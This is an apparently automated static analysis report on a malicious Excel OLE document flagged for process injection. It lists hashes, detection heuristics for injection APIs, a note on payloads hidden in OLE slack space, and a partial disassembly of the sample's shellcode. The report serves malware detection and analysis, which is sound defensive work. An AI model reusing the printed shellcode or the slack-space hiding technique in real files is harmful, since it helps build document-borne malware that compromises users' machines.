Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 83567d18f7b5b092…

MALICIOUS

Office (OLE)

221.1 KB Created: 2011-05-12 09:56:45 Authoring application: Microsoft Excel First seen: 2017-12-09
MD5: 8224afcb9903593ecb7ccc1c6208bad2 SHA-1: 0d2f3af774e935072ca74514e5fc97da927f89d7 SHA-256: 83567d18f7b5b0927d42c333ab594dba1a863c7eaf6332d681aa0a268b5c87e8
340 Risk Score

Malware Insights

MITRE ATT&CK
T1055 Process Injection T1055.012 Process Hollowing

The file is an OLE document that exhibits characteristics of a malicious macro-enabled file. Heuristics indicate the use of Windows API functions such as WinExec, VirtualAlloc, WriteProcessMemory, CreateRemoteThread, and LoadLibrary, suggesting the sample attempts to inject and execute code within another process. The large slack space anomaly in the OLE structure further supports the possibility of hidden or packed malicious content.

Heuristics 8

  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • x86 GetPC stub (CALL $+5; POP EAX) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EAX)
    Disassembly
    Attempted x86 opcode disassembly
    00007D55  e800000000        call 0x7d5a
    00007D5A  58                pop eax
    00007D5B  83c005            add eax, 5
    00007D5E  c3                ret
    00007D5F  f3a4              rep movsb byte ptr es:[edi], byte ptr [esi]
    00007D61  33c0              xor eax, eax
    00007D63  8bcb              mov ecx, ebx
    00007D65  f3aa              rep stosb byte ptr es:[edi], al
    00007D67  6a00              push 0
    00007D69  ffd2              call edx
    00007D6B  50                push eax
    00007D6C  ffd5              call ebp
    00007D6E  8b4f14            mov ecx, dword ptr [edi + 0x14]
    00007D71  8b07              mov eax, dword ptr [edi]
    00007D73  8bd0              mov edx, eax
    00007D75  03d1              add edx, ecx
    00007D77  8b5f10            mov ebx, dword ptr [edi + 0x10]
    00007D7A  03d9              add ebx, ecx
    00007D7C  2bda              sub ebx, edx
    00007D7E  8b6e18            mov ebp, dword ptr [esi + 0x18]
    00007D81  8b561c            mov edx, dword ptr [esi + 0x1c]
    00007D84  8b7710            mov esi, dword ptr [edi + 0x10]
    00007D87  8b3f              mov edi, dword ptr [edi]
    00007D89  ffe4              jmp esp
    00007D8B  ff561c            call dword ptr [esi + 0x1c]
    00007D8E  6a00              push 0
    00007D90  ff5618            call dword ptr [esi + 0x18]
    00007D93  53                push ebx
    00007D94  55                push ebp
    00007D95  56                push esi
    00007D96  57                push edi
    00007D97  368b6c2418        mov ebp, dword ptr ss:[esp + 0x18]
    00007D9C  368b453c          mov eax, dword ptr ss:[ebp + 0x3c]
    00007DA0  368b540578        mov edx, dword ptr ss:[ebp + eax + 0x78]
    00007DA5  03d5              add edx, ebp
    00007DA7  3e8b4a18          mov ecx, dword ptr ds:[edx + 0x18]
    00007DAB  3e8b5a20          mov ebx, dword ptr ds:[edx + 0x20]
    00007DAF  03dd              add ebx, ebp
    00007DB1  e338              jecxz 0x7deb
    00007DB3  49                dec ecx
    00007DB4  3e                .byte 0x3e
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 226,404 bytes but its declared streams total only 29,612 bytes — 196,792 bytes (87%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API